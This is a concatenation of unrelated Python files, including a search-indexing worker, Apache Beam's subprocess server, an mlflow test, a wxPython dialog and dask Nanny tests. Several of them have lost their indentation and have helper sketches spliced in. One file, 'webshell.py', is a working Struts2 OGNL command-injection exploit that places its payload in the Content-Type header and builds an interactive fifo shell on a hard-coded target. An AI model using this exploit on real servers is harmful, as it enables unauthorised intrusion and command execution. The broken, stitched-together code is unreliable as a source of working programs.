from searchzone.tasks.helper import read_file_and_add_to_queue
from searchzone.elastic.appsearch import AppSearchConnector
from searchzone.tasks.update import outdated
from searchzone.tasks.new import new
from searchzone.tasks.diff import diff
from searchzone.tasks.delete import delete
from searchzone.tasks.email import email
LOGGER = logging.getLogger(__name__)
class Worker:
def __init__(self, url, engine, key, file=None):
self.url = url
self.engine = engine
self.key = key
self.file = file
self.appsearch = AppSearchConnector(self.url, self.key, self.engine)
self.domain_queue = queue.Queue()
LOGGER.debug('Performing requests on: %s engine: %s with file: %s', self.url, self.engine, self.file)
def update(self):
for _ in range(10):
threading.Thread(target=new, args=[self.appsearch, self.domain_queue, False], daemon=True).start()
self.domain_queue.join()
for i in range(2500):
LOGGER.info('Starting updating 1000 users to %d', i * 1000)
outdated(self.appsearch, self.domain_queue)
LOGGER.info('Sleeping for 300 seconds to let elastic and threads do their job')
sleep(300)
def new(self):
LOGGER.info('Starting threads for Action NEW')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=new, args=[self.appsearch, self.domain_queue, True], daemon=True).start()
self.domain_queue.join()
def diff(self):
LOGGER.info('Starting threads for Action DIFF')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=diff, args=[self.appsearch, self.domain_queue], daemon=True).start()
self.domain_queue.join()
def delete(self):
LOGGER.info('Delete')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=delete, args=[self.appsearch, self.domain_queue], daemon=True).start()
self.domain_queue.join()
def email(self):
LOGGER.info('email')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=email, args=[self.appsearch, self.domain_queue], daemon=True).start()
self.domain_queue.join()
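# Minimal standalone sketch (not part of this module) of the fan-out pattern
# each method above relies on: fill a queue, start a fixed pool of daemon
# threads that call task_done() per item, and block on join() until every
# queued item has been processed.
def _fan_out_sketch(items, handler, n_threads=10):
    work = queue.Queue()
    for item in items:
        work.put(item)
    def _consume():
        while True:
            item = work.get()
            try:
                handler(item)
            finally:
                work.task_done()
    for _ in range(n_threads):
        threading.Thread(target=_consume, daemon=True).start()
    work.join()  # returns once every queued item has been marked done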
|
subprocess_server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import contextlib
import logging
import os
import re
import shutil
import signal
import socket
import subprocess
import tempfile
import threading
import time
import grpc
from future.moves.urllib.error import URLError
from future.moves.urllib.request import urlopen
from apache_beam.version import __version__ as beam_version
_LOGGER = logging.getLogger(__name__)
class SubprocessServer(object):
"""An abstract base class for running GRPC Servers as an external process.
This class acts as a context which will start up a server, provides a stub
to connect to it, and then shuts the server down. For example::
with SubprocessServer(GrpcStubClass, [executable, arg, ...]) as stub:
stub.CallService(...)
"""
def __init__(self, stub_class, cmd, port=None):
"""Creates the server object.
:param stub_class: the auto-generated GRPC client stub class used for
connecting to the GRPC service
:param cmd: command (including arguments) for starting up the server,
        suitable for passing to `subprocess.Popen`.
:param port: (optional) the port at which the subprocess will serve its
service. If not given, one will be randomly chosen and the special
string "{{PORT}}" will be substituted in the command line arguments
with the chosen port.
"""
self._process_lock = threading.RLock()
self._process = None
self._stub_class = stub_class
self._cmd = [str(arg) for arg in cmd]
self._port = port
def __enter__(self):
return self.start()
def __exit__(self, *unused_args):
self.stop()
def start(self):
try:
endpoint = self.start_process()
wait_secs = .1
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
channel = grpc.insecure_channel(endpoint, options=channel_options)
channel_ready = grpc.channel_ready_future(channel)
while True:
if self._process is not None and self._process.poll() is not None:
_LOGGER.error("Starting job service with %s", self._process.args)
raise RuntimeError(
'Service failed to start up with error %s' % self._process.poll())
try:
channel_ready.result(timeout=wait_secs)
break
except (grpc.FutureTimeoutError, grpc.RpcError):
wait_secs *= 1.2
logging.log(
logging.WARNING if wait_secs > 1 else logging.DEBUG,
'Waiting for grpc channel to be ready at %s.',
endpoint)
return self._stub_class(channel)
except: # pylint: disable=bare-except
_LOGGER.exception("Error bringing up service")
self.stop()
raise
def start_process(self):
with self._process_lock:
if self._process:
self.stop()
if self._port:
port = self._port
cmd = self._cmd
else:
port, = pick_port(None)
cmd = [arg.replace('{{PORT}}', str(port)) for arg in self._cmd]
endpoint = 'localhost:%s' % port
_LOGGER.info("Starting service with %s", str(cmd).replace("',", "'"))
self._process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# Emit the output of this command as info level logging.
def log_stdout():
line = self._process.stdout.readline()
while line:
# Remove newline via rstrip() to not print an empty line
_LOGGER.info(line.rstrip())
line = self._process.stdout.readline()
t = threading.Thread(target=log_stdout)
t.daemon = True
t.start()
return endpoint
def stop(self):
self.stop_process()
def stop_process(self):
with self._process_lock:
if not self._process:
return
for _ in range(5):
if self._process.poll() is not None:
break
logging.debug("Sending SIGINT to job_server")
self._process.send_signal(signal.SIGINT)
time.sleep(1)
if self._process.poll() is None:
self._process.kill()
self._process = None
def local_temp_dir(self, **kwargs):
return tempfile.mkdtemp(dir=self._local_temp_root, **kwargs)
class JavaJarServer(SubprocessServer):
APACHE_REPOSITORY = 'https://repo.maven.apache.org/maven2'
BEAM_GROUP_ID = 'org.apache.beam'
JAR_CACHE = os.path.expanduser("~/.apache_beam/cache/jars")
_BEAM_SERVICES = type(
'local', (threading.local, ),
dict(__init__=lambda self: setattr(self, 'replacements', {})))()
def __init__(self, stub_class, path_to_jar, java_arguments):
super(JavaJarServer, self).__init__(
stub_class, ['java', '-jar', path_to_jar] + list(java_arguments))
self._existing_service = path_to_jar if _is_service_endpoint(
path_to_jar) else None
def start_process(self):
if self._existing_service:
return self._existing_service
else:
if not shutil.which('java'):
raise RuntimeError(
'Java must be installed on this system to use this '
'transform/runner.')
return super(JavaJarServer, self).start_process()
def stop_process(self):
if self._existing_service:
pass
else:
return super(JavaJarServer, self).stop_process()
@classmethod
def jar_name(cls, artifact_id, version, classifier=None, appendix=None):
return '-'.join(
filter(None, [artifact_id, appendix, version, classifier])) + '.jar'
@classmethod
def path_to_maven_jar(
cls,
artifact_id,
group_id,
version,
repository=APACHE_REPOSITORY,
classifier=None,
appendix=None):
return '/'.join([
repository,
group_id.replace('.', '/'),
artifact_id,
version,
cls.jar_name(artifact_id, version, classifier, appendix)
])
@classmethod
def path_to_beam_jar(
cls,
gradle_target,
appendix=None,
version=beam_version,
artifact_id=None):
if gradle_target in cls._BEAM_SERVICES.replacements:
return cls._BEAM_SERVICES.replacements[gradle_target]
gradle_package = gradle_target.strip(':').rsplit(':', 1)[0]
if not artifact_id:
artifact_id = 'beam-' + gradle_package.replace(':', '-')
project_root = os.path.sep.join(
os.path.abspath(__file__).split(os.path.sep)[:-5])
local_path = os.path.join(
project_root,
gradle_package.replace(':', os.path.sep),
'build',
'libs',
cls.jar_name(
artifact_id,
version.replace('.dev', ''),
classifier='SNAPSHOT',
appendix=appendix))
if os.path.exists(local_path):
_LOGGER.info('Using pre-built snapshot at %s', local_path)
return local_path
elif '.dev' in version:
# TODO: Attempt to use nightly snapshots?
raise RuntimeError(
(
'%s not found. '
'Please build the server with \n cd %s; ./gradlew %s') %
(local_path, os.path.abspath(project_root), gradle_target))
else:
return cls.path_to_maven_jar(
artifact_id,
cls.BEAM_GROUP_ID,
version,
cls.APACHE_REPOSITORY,
appendix=appendix)
@classmethod
def local_jar(cls, url, cache_dir=None):
if cache_dir is None:
cache_dir = cls.JAR_CACHE
# TODO: Verify checksum?
if _is_service_endpoint(url):
return url
elif os.path.exists(url):
return url
else:
cached_jar = os.path.join(cache_dir, os.path.basename(url))
if os.path.exists(cached_jar):
_LOGGER.info('Using cached job server jar from %s' % url)
else:
_LOGGER.info('Downloading job server jar from %s' % url)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# TODO: Clean up this cache according to some policy.
try:
url_read = urlopen(url)
with open(cached_jar + '.tmp', 'wb') as jar_write:
shutil.copyfileobj(url_read, jar_write, length=1 << 20)
os.rename(cached_jar + '.tmp', cached_jar)
except URLError as e:
raise RuntimeError(
'Unable to fetch remote job server jar at %s: %s' % (url, e))
return cached_jar
@classmethod
@contextlib.contextmanager
def beam_services(cls, replacements):
try:
old = cls._BEAM_SERVICES.replacements
cls._BEAM_SERVICES.replacements = dict(old, **replacements)
yield
finally:
cls._BEAM_SERVICES.replacements = old
def _is_service_endpoint(path):
return re.match(r'^[a-zA-Z0-9.-]+:\d+$', path)
def pick_port(*ports):
"""
Returns a list of ports, same length as input ports list, but replaces
all None or 0 ports with a random free port.
"""
sockets = []
def find_free_port(port):
if port:
return port
else:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except OSError as e:
# [Errno 97] Address family not supported by protocol
# Likely indicates we are in an IPv6-only environment (BEAM-10618). Try
# again with AF_INET6.
if e.errno == 97:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
raise e
sockets.append(s)
s.bind(('localhost', 0))
return s.getsockname()[1]
ports = list(map(find_free_port, ports))
# Close sockets only now to avoid the same port to be chosen twice
for s in sockets:
s.close()
return ports
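# A minimal standalone sketch of the free-port trick pick_port() relies on:
# binding to port 0 asks the OS for an unused port, and getsockname() then
# reveals which port was assigned. pick_port() defers close() so the same
# port is not handed out twice within one call.
def _free_port_sketch():
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.bind(('localhost', 0))
  port = s.getsockname()[1]
  s.close()
  return port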
|
keep_alive.py
|
from flask import Flask
from threading import Thread
class localFlask(Flask):
def process_response(self, res):
#Every response will be processed here first
res.headers = {}
return res
app = localFlask('')
@app.route('/')
def home():
return ''
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
Thread(target=run).start()
|
test_process_utils.py
|
import pytest
import uuid
from mlflow.utils.process import cache_return_value_per_process
from multiprocessing import Process, Queue
@cache_return_value_per_process
def _gen_random_str1(v):
return str(v) + uuid.uuid4().hex
@cache_return_value_per_process
def _gen_random_str2(v):
return str(v) + uuid.uuid4().hex
@cache_return_value_per_process
def _gen_random_no_arg():
return uuid.uuid4().hex
def _test_cache_return_value_per_process_child_proc_target(path1, path3, queue):
# in forked out child process
child_path1 = _gen_random_str1(True)
child_path2 = _gen_random_str1(False)
result = len({path1, path3, child_path1, child_path2}) == 4
queue.put(result)
def test_cache_return_value_per_process():
path1 = _gen_random_str1(True)
path2 = _gen_random_str1(True)
assert path1 == path2
path3 = _gen_random_str1(False)
assert path3 != path2
no_arg_path1 = _gen_random_no_arg()
no_arg_path2 = _gen_random_no_arg()
assert no_arg_path1 == no_arg_path2
with pytest.raises(
ValueError,
match="The function decorated by `cache_return_value_per_process` is not allowed to be"
"called with key-word style arguments.",
):
_gen_random_str1(v=True)
f2_path1 = _gen_random_str2(True)
f2_path2 = _gen_random_str2(False)
assert len({path1, path3, f2_path1, f2_path2}) == 4
queue = Queue()
child_proc = Process(
target=_test_cache_return_value_per_process_child_proc_target, args=(path1, path3, queue)
)
child_proc.start()
child_proc.join()
assert queue.get(), "Testing inside child process failed."
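# A minimal sketch of per-process memoization (an illustration, not mlflow's
# implementation): results are cached per (pid, positional args), so a child
# process with a different pid recomputes instead of reusing parent values.
import os

def _cache_per_process_sketch(fn):
    _cache = {}

    def wrapper(*args):
        key = (os.getpid(), args)
        if key not in _cache:
            _cache[key] = fn(*args)
        return _cache[key]

    return wrapper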
|
webshell.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import base64
import random
import requests
import threading
import time
class WebShell(object):
# Initialize Class + Setup Shell
def __init__(self, interval=1.3, proxies='http://127.0.0.1:8080'):
self.url = r"http://10.10.10.64/Monitoring/example/Welcome.action"
self.proxies = {'http': proxies}
session = random.randrange(10000,99999)
print(f"[*] Session ID: {session}")
self.stdin = f'/dev/shm/input.{session}'
self.stdout = f'/dev/shm/output.{session}'
self.interval = interval
# set up shell
print("[*] Setting up fifo shell on target")
MakeNamedPipes = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.RunRawCmd(MakeNamedPipes, timeout=0.1)
# set up read thread
print("[*] Setting up read thread")
self.interval = interval
thread = threading.Thread(target=self.ReadThread, args=())
thread.daemon = True
thread.start()
# Read $session output text to screen & wipe session
def ReadThread(self):
GetOutput = f"/bin/cat {self.stdout}"
while True:
result = self.RunRawCmd(GetOutput) #, proxy=None)
if result:
print(result)
ClearOutput = f'echo -n "" > {self.stdout}'
self.RunRawCmd(ClearOutput)
time.sleep(self.interval)
# Execute Command
def RunRawCmd(self, cmd, timeout=50, proxy="http://127.0.0.1:8080"):
#print(f"Going to run cmd: {cmd}")
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
if proxy:
proxies = self.proxies
else:
proxies = {}
headers = {'User-Agent': 'YouAllRock', 'Content-Type': payload}
try:
r = requests.get(self.url, headers=headers, proxies=proxies, timeout=timeout)
return r.text
except:
pass
# Send b64'd command to RunRawCommand
def WriteCmd(self, cmd):
b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8')
stage_cmd = f'echo {b64cmd} | base64 -d > {self.stdin}'
self.RunRawCmd(stage_cmd)
time.sleep(self.interval * 1.1)
def UpgradeShell(self):
# upgrade shell
UpgradeShell = """python3 -c 'import pty; pty.spawn("/bin/bash")'"""
self.WriteCmd(UpgradeShell)
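# Illustrative staging sketch (mirrors WebShell.WriteCmd above; the fifo path
# is a placeholder): base64-encoding the command sidesteps quoting and
# escaping problems in transit, and the target decodes it into the fifo.
def staging_sketch(cmd, stdin='/dev/shm/input.12345'):
    b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8')
    return f'echo {b64cmd} | base64 -d > {stdin}'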
prompt = "Prompt> "
S = WebShell()
while True:
cmd = input(prompt)
if cmd == "upgrade":
prompt = ""
S.UpgradeShell()
else:
S.WriteCmd(cmd)
|
editscenariodb.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import time
import wx
import cw
#-------------------------------------------------------------------------------
# Scenario database construction dialog
#-------------------------------------------------------------------------------
class ConstructScenarioDB(wx.Dialog):
def __init__(self, parent, dpaths):
"""シナリオ検索の始点から見つかる全てのシナリオを
シナリオDBに登録する。
"""
wx.Dialog.__init__(self, parent, -1, u"シナリオデータベースの構築",
style=wx.CAPTION|wx.SYSTEM_MENU|wx.CLOSE_BOX)
self.cwpy_debug = True
self.dpaths = dpaths
self._message = u"フォルダの一覧を作成しています..."
self._curnum = 0
self._complete = False
self._cancel = False
self._clear = False
self.text = wx.StaticText(self, -1, u"シナリオフォルダを起点として発見できる全てのシナリオを\nシナリオデータベースに登録します。\nデータベースに登録されたシナリオはシナリオ選択ダイアログで\n高速に表示できる他、検索で発見できるようになります。\nシナリオデータベースの構築を開始しますか?")
self.clear = wx.CheckBox(self, -1, u"構築前にデータベースを初期化する")
# btn
self.okbtn = wx.Button(self, -1, u"構築開始...")
self.cnclbtn = wx.Button(self, wx.ID_CANCEL, u"キャンセル")
self._do_layout()
self._bind()
def _bind(self):
self.Bind(wx.EVT_BUTTON, self.OnClickOkBtn, self.okbtn)
def _do_layout(self):
sizer_top = wx.BoxSizer(wx.VERTICAL)
sizer_top.Add(self.text, 0, wx.BOTTOM, cw.ppis(10))
sizer_top.Add(self.clear, 0, wx.ALIGN_RIGHT, cw.ppis(0))
sizer_btn = wx.BoxSizer(wx.HORIZONTAL)
sizer_btn.Add(self.okbtn, 1, 0, cw.ppis(0))
sizer_btn.Add(cw.ppis((10, 0)), 0, 0, cw.ppis(0))
sizer_btn.Add(self.cnclbtn, 1, 0, cw.ppis(0))
sizer_v1 = wx.BoxSizer(wx.VERTICAL)
sizer_v1.Add(sizer_top, 0, 0, cw.ppis(0))
sizer_v1.Add(sizer_btn, 0, wx.ALIGN_RIGHT|wx.TOP, cw.ppis(10))
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(sizer_v1, 0, wx.ALL, cw.ppis(10))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
def construct_scenariodb(self):
self._message = u"フォルダの一覧を作成しています..."
self._curnum = 0
while not cw.scenariodb.ScenariodbUpdatingThread.is_finished():
pass
d = {}
count = 0
for i, (skintype, dpaths) in enumerate(self.dpaths.iteritems()):
if self._cancel:
break
self._message = u"フォルダの一覧を作成しています... (%s/%s)" % (i+1, len(self.dpaths))
if skintype in d:
s = d[skintype]
else:
s = set()
d[skintype] = s
for dpath in dpaths:
if self._cancel:
break
s2 = cw.scenariodb.find_alldirectories(dpath, lambda: self._cancel)
count += len(s2)
s.update(s2)
self._curnum += 1
db = cw.cwpy.frame.open_scenariodb()
if self._clear and not self._cancel:
db.delete_all(commit=False)
completed = 0
for skintype, dpaths in d.iteritems():
if self._cancel:
break
for dpath in dpaths:
if self._cancel:
break
self._message = u"シナリオを登録しています... (%s/%s)" % (completed+1, count)
db.update(dpath=dpath, skintype=skintype, commit=False)
completed += 1
self._curnum = len(self.dpaths) + int((float(completed)/count)*100)
if not self._cancel:
db.commit()
self._message = u"データベース内の空領域を再編成しています..."
db.vacuum()
self._curnum = 100+len(self.dpaths)+1
self._complete = True
def OnClickOkBtn(self, event):
        # Show the progress dialog
dlg = cw.dialog.progress.SysProgressDialog(self,
u"シナリオデータベースの構築", u"",
maximum=100+len(self.dpaths)+1,
cancelable=True)
cw.cwpy.frame.move_dlg(dlg)
self._message = u"フォルダの一覧を作成しています..."
self._curnum = 0
self._complete = False
self._cancel = False
self._clear = self.clear.IsChecked()
thread = threading.Thread(target=self.construct_scenariodb)
thread.start()
def progress():
while not self._complete and not dlg.cancel:
self._cancel = dlg.cancel
wx.CallAfter(dlg.Update, self._curnum, self._message)
time.sleep(0.001)
self._cancel = dlg.cancel
wx.CallAfter(dlg.Destroy)
thread2 = threading.Thread(target=progress)
thread2.start()
dlg.ShowModal()
thread.join()
thread2.join()
if not self._cancel:
s = u"データベースの構築が完了しました。"
wx.MessageBox(s, u"メッセージ", wx.OK|wx.ICON_INFORMATION, self)
self.Destroy()
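# Minimal standalone sketch (independent of the dialog above) of the pattern
# used in OnClickOkBtn: run the slow work in a background thread and marshal
# every UI update back to the main thread with wx.CallAfter, which is safe to
# call from worker threads.
def _callafter_sketch():
    app = wx.App(False)
    frame = wx.Frame(None, -1, u"progress sketch")
    label = wx.StaticText(frame, -1, u"working...")
    frame.Show()
    def work():
        for i in range(5):
            time.sleep(0.2)
            wx.CallAfter(label.SetLabel, u"step %d" % (i + 1))
        wx.CallAfter(frame.Close)
    threading.Thread(target=work).start()
    app.MainLoop()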
|
test_nanny.py
|
import asyncio
import gc
import logging
import multiprocessing as mp
import os
import random
import sys
from contextlib import suppress
from time import sleep
from unittest import mock
import psutil
import pytest
pytestmark = pytest.mark.gpu
from tlz import first, valmap
from tornado.ioloop import IOLoop
import dask
from dask.utils import tmpfile
from distributed import Nanny, Scheduler, Worker, rpc, wait, worker
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import CommClosedError, Status
from distributed.diagnostics import SchedulerPlugin
from distributed.metrics import time
from distributed.protocol.pickle import dumps
from distributed.utils import TimeoutError, parse_ports
from distributed.utils_test import captured_logger, gen_cluster, gen_test, inc
pytestmark = pytest.mark.ci1
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=120)
async def test_nanny(s):
async with Nanny(s.address, nthreads=2, loop=s.loop) as n:
async with rpc(n.address) as nn:
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.kill()
assert not n.is_alive()
start = time()
while n.worker_address in s.workers:
assert time() < start + 1
await asyncio.sleep(0.01)
await nn.kill()
assert not n.is_alive()
assert n.worker_address not in s.workers
await nn.instantiate()
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.terminate()
assert not n.is_alive()
@gen_cluster(nthreads=[])
async def test_many_kills(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
assert n.is_alive()
await asyncio.gather(*(n.kill() for _ in range(5)))
await asyncio.gather(*(n.kill() for _ in range(5)))
await n.close()
@gen_cluster(Worker=Nanny)
async def test_str(s, a, b):
assert a.worker_address in str(a)
assert a.worker_address in repr(a)
assert str(a.nthreads) in str(a)
assert str(a.nthreads) in repr(a)
@gen_cluster(nthreads=[], client=True)
async def test_nanny_process_failure(c, s):
n = await Nanny(s.address, nthreads=2)
first_dir = n.worker_dir
assert os.path.exists(first_dir)
ww = rpc(n.worker_address)
await ww.update_data(data=valmap(dumps, {"x": 1, "y": 2}))
pid = n.pid
assert pid is not None
with suppress(CommClosedError):
await c.run(os._exit, 0, workers=[n.worker_address])
while n.pid == pid: # wait while process dies and comes back
await asyncio.sleep(0.01)
await asyncio.sleep(1)
while not n.is_alive(): # wait while process comes back
await asyncio.sleep(0.01)
# assert n.worker_address != original_address # most likely
while n.worker_address not in s.nthreads or n.worker_dir is None:
await asyncio.sleep(0.01)
second_dir = n.worker_dir
await n.close()
assert not os.path.exists(second_dir)
assert not os.path.exists(first_dir)
assert first_dir != n.worker_dir
await ww.close_rpc()
s.stop()
@gen_cluster(nthreads=[])
async def test_run(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
with rpc(n.address) as nn:
response = await nn.run(function=dumps(lambda: 1))
assert response["status"] == "OK"
assert response["result"] == 1
await n.close()
@pytest.mark.slow
@gen_cluster(config={"distributed.comm.timeouts.connect": "1s"}, timeout=120)
async def test_no_hang_when_scheduler_closes(s, a, b):
# https://github.com/dask/distributed/issues/2880
with captured_logger("tornado.application", logging.ERROR) as logger:
await s.close()
await asyncio.sleep(1.2)
assert a.status == Status.closed
assert b.status == Status.closed
out = logger.getvalue()
assert "Timed out trying to connect" not in out
@pytest.mark.slow
@gen_cluster(
Worker=Nanny, nthreads=[("127.0.0.1", 1)], worker_kwargs={"reconnect": False}
)
async def test_close_on_disconnect(s, w):
await s.close()
start = time()
while w.status != Status.closed:
await asyncio.sleep(0.05)
assert time() < start + 9
class Something(Worker):
# a subclass of Worker which is not Worker
pass
@gen_cluster(client=True, Worker=Nanny)
async def test_nanny_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Worker" in list(out.values())[0]
assert w1.Worker is Worker
@gen_cluster(client=True, Worker=Nanny, worker_kwargs={"worker_class": Something})
async def test_nanny_alt_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Something" in list(out.values())[0]
assert w1.Worker is Something
@pytest.mark.slow
@gen_cluster(nthreads=[])
async def test_nanny_death_timeout(s):
await s.close()
w = Nanny(s.address, death_timeout=1)
with pytest.raises(TimeoutError):
await w
assert w.status == Status.closed
@gen_cluster(client=True, Worker=Nanny)
async def test_random_seed(c, s, a, b):
async def check_func(func):
x = c.submit(func, 0, 2**31, pure=False, workers=a.worker_address)
y = c.submit(func, 0, 2**31, pure=False, workers=b.worker_address)
assert x.key != y.key
x = await x
y = await y
assert x != y
await check_func(lambda a, b: random.randint(a, b))
np = pytest.importorskip("numpy")
await check_func(lambda a, b: np.random.randint(a, b))
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@gen_cluster(nthreads=[])
async def test_num_fds(s):
proc = psutil.Process()
# Warm up
w = await Nanny(s.address)
await w.close()
del w
gc.collect()
before = proc.num_fds()
for i in range(3):
w = await Nanny(s.address)
await asyncio.sleep(0.1)
await w.close()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
await asyncio.sleep(0.1)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(client=True, nthreads=[])
async def test_worker_uses_same_host_as_nanny(c, s):
for host in ["tcp://0.0.0.0", "tcp://127.0.0.2"]:
n = await Nanny(s.address, host=host)
def func(dask_worker):
return dask_worker.listener.listen_address
result = await c.run(func)
assert host in first(result.values())
await n.close()
@gen_test()
async def test_scheduler_file():
with tmpfile() as fn:
s = await Scheduler(scheduler_file=fn, dashboard_address=":0")
w = await Nanny(scheduler_file=fn)
assert set(s.workers) == {w.worker_address}
await w.close()
s.stop()
@gen_cluster(client=True, Worker=Nanny, nthreads=[("127.0.0.1", 2)])
async def test_nanny_timeout(c, s, a):
x = await c.scatter(123)
with captured_logger(
logging.getLogger("distributed.nanny"), level=logging.ERROR
) as logger:
response = await a.restart(timeout=0.1)
out = logger.getvalue()
assert "timed out" in out.lower()
start = time()
while x.status != "cancelled":
await asyncio.sleep(0.1)
assert time() < start + 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "400 MiB"},
)
async def test_nanny_terminate(c, s, a):
def leak():
L = []
while True:
L.append(b"0" * 5_000_000)
sleep(0.01)
before = a.process.pid
with captured_logger(logging.getLogger("distributed.nanny")) as logger:
future = c.submit(leak)
while a.process.pid == before:
await asyncio.sleep(0.01)
out = logger.getvalue()
assert "restart" in out.lower()
assert "memory" in out.lower()
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 8,
client=True,
Worker=Worker,
clean_kwargs={"threads": False},
)
async def test_throttle_outgoing_connections(c, s, a, *workers):
    # Put a bunch of small data on worker a
await c.run(lambda: logging.getLogger("distributed.worker").setLevel(logging.DEBUG))
remote_data = c.map(
lambda x: b"0" * 10000, range(10), pure=False, workers=[a.address]
)
await wait(remote_data)
def pause(dask_worker):
# Patch paused and memory_monitor on the one worker
        # This is very fragile, since a refactor of memory_monitor to
# remove _memory_monitoring will break this test.
dask_worker._memory_monitoring = True
dask_worker.status = Status.paused
dask_worker.outgoing_current_count = 2
await c.run(pause, workers=[a.address])
requests = [
await a.get_data(await w.rpc.connect(w.address), keys=[f.key], who=w.address)
for w in workers
for f in remote_data
]
await wait(requests)
wlogs = await c.get_worker_logs(workers=[a.address])
wlogs = "\n".join(x[1] for x in wlogs[a.address])
assert "throttling" in wlogs.lower()
@gen_cluster(nthreads=[], client=True)
async def test_avoid_memory_monitor_if_zero_limit(c, s):
nanny = await Nanny(s.address, loop=s.loop, memory_limit=0)
typ = await c.run(lambda dask_worker: type(dask_worker.data))
assert typ == {nanny.worker_address: dict}
pcs = await c.run(lambda dask_worker: list(dask_worker.periodic_callbacks))
assert "memory" not in pcs
assert "memory" not in nanny.periodic_callbacks
future = c.submit(inc, 1)
assert await future == 2
await asyncio.sleep(0.02)
await c.submit(inc, 2) # worker doesn't pause
await nanny.close()
@gen_cluster(nthreads=[], client=True)
async def test_scheduler_address_config(c, s):
with dask.config.set({"scheduler-address": s.address}):
nanny = await Nanny(loop=s.loop)
assert nanny.scheduler.address == s.address
start = time()
while not s.workers:
await asyncio.sleep(0.1)
assert time() < start + 10
await nanny.close()
@pytest.mark.slow
@gen_test()
async def test_wait_for_scheduler():
with captured_logger("distributed") as log:
w = Nanny("127.0.0.1:44737")
IOLoop.current().add_callback(w.start)
await asyncio.sleep(6)
await w.close()
log = log.getvalue()
assert "error" not in log.lower(), log
assert "restart" not in log.lower(), log
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable(c, s):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
b = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "456"})
await asyncio.gather(a, b)
results = await c.run(lambda: os.environ["FOO"])
assert results == {a.worker_address: "123", b.worker_address: "456"}
await asyncio.gather(a.close(), b.close())
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable_by_config(c, s, monkeypatch):
with dask.config.set({"distributed.nanny.environ": "456"}):
with pytest.raises(TypeError, match="configuration must be of type dict"):
Nanny(s.address, loop=s.loop, memory_limit=0)
with dask.config.set({"distributed.nanny.environ": {"FOO": "456"}}):
# precedence
# kwargs > env var > config
with mock.patch.dict(os.environ, {"FOO": "BAR"}, clear=True):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
x = Nanny(s.address, loop=s.loop, memory_limit=0)
b = Nanny(s.address, loop=s.loop, memory_limit=0)
await asyncio.gather(a, b, x)
results = await c.run(lambda: os.environ["FOO"])
assert results == {
a.worker_address: "123",
b.worker_address: "456",
x.worker_address: "BAR",
}
await asyncio.gather(a.close(), b.close(), x.close())
